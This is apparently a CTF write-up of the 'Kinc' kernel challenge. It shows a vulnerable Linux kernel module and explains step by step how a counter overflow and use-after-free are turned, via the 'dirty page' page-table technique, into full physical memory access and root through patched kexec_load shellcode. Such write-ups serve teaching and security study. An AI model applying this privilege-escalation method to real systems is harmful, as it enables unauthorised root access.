BlackHat MEA CTF Qualification - Kinc write-up

Kinc was a kernel exploitation challenge with a vulnerable kernel module featuring a use-after-free bug. The module’s increment primitive had an 8-bit counter that could be overflowed to bypass usage restrictions.

We used the “dirty page” technique to replace freed kernel objects with page table entries. By mapping memory at specific addresses and using the vulnerable increment primitive to modify physical addresses within page tables, we gained read/write access to all physical memory. Finally, we patched the kexec_load syscall with privilege escalation shellcode to get root and retrieve the flag.

The bug

In this task, we’re given a buggy kernel module, and we’re asked to get root on a machine with this buggy module loaded. The module exposes a /dev/vuln device, with a handful of ioctls:

static struct kmem_cache *obj_cachep;
static DEFINE_MUTEX(module_lock);

unsigned char inc_used = 0;
struct obj *selected = 0;
struct obj *obj_array[MAX_OBJ_NUM] = { NULL };

static long module_ioctl(struct file *file, unsigned int cmd, unsigned long arg) {
  long ret = -EINVAL;
  mutex_lock(&module_lock);

  if (arg >= MAX_OBJ_NUM)
    goto out;

  switch (cmd) {
    case CMD_ALLOC:
      obj_array[arg] = kmem_cache_zalloc(obj_cachep, GFP_KERNEL);
      ret = 0;
      break;

    case CMD_SEL:
      if (!obj_array[arg])
        goto out;
      selected = obj_array[arg];
      ret = 0;
      break;

    case CMD_INC:
      if (inc_used++ > 1)
        goto out;
      selected->cnt++;
      ret = 0;
      break;

    case CMD_DELETE:
      if (!obj_array[arg])
        goto out;
      kmem_cache_free(obj_cachep, obj_array[arg]);
      obj_array[arg] = NULL;
      ret = 0;
      break;
  }

 out:
  mutex_unlock(&module_lock);
  return ret;
}

This module lets us allocate up to 256 “objects”, deallocate already allocated objects, “select” one object (this stores the pointer to the object in a static variable), and increment a field inside the object (the object is 0x800 bytes in size, and the field we’re incrementing is at 0x7f8).

It seems that the authors meant to have the increment primitive being usable only once, but since the inc_used variable is only 8 bits, it can be easily overflown, and this restriction is not really an issue.

Linux heap basics (really quickly)

In the Linux kernel, allocations are usually performed from so-called slabs. This means that a page is divided into consecutive chunks of the same size, and they are allocated/freed as necessary. A page is never shared between different slabs at the same time. There are both “generic” slabs for kmalloc allocations of common sizes, and specialized slabs that hold only one type of objects (like the one used in this task).

The “Dirty page” technique

Since reallocating a freed struct obj with another struct obj is not very useful, and the slab is specialized, what we have to do is free the whole page containing the freed object, and replace it with a completely different type of page. A common technique here is to reallocate it as a pagetable for a userspace process.

So, the exploit flow is as follows:

Allocate a bunch of vulnerable objects, “select” one of them, then free the objects.
Use memfd_create to get an ephemeral in-memory file, resize it to 1 page (4096 bytes), and map it at multiple addresses, whose lower 21 bits are 0xff000. This ensures that a separate page table is allocated for each mapping, and the shared page’s physical address is stored at offset 0x7f8 inside the page table.
Use the vulnerable increment primitive to “increment” the vulnerable object 4096 times. This makes the address in the page table point to the next physical page instead of the original one.
Flush the TLB by mprotecting the mappings to RO and back to RW and reprobing every page.
Find the one page where the page contents differ from the other pages.
Keep incrementing the vulnerable object until our buggy page looks like a pagetable (has a single nonzero qword at offset 0x7f8, whose lowermost byte is 0x67 and uppermost byte is 0x80)
Replace that mapping with 7 (which points to physical address 0 with user RWX permissions), search through the mappings again until we find a real-mode IVT in one of them.
Now we can write any 512 physical addresses (OR’ed with 7 to give userspace RW permissions) to the first bogus page, and access the corresponding pages through the second bogus mapping.

After we’ve got RW access to all of the physical memory, all we need to do is to patch some useless syscall with shellcode that will give us root. I opted to replace kexec_load with a small shellcode that calls commit_creds(prepare_kernel_cred(&init_task)), which gives our process root & full capabilities. Since we’re working at physical memory level, memory permissions are not an issue, and we can just pattern-match the original kexec_load syscall and replace it with the shellcode. After that, a system("cat /dev/sdb") is all it takes to get the flag.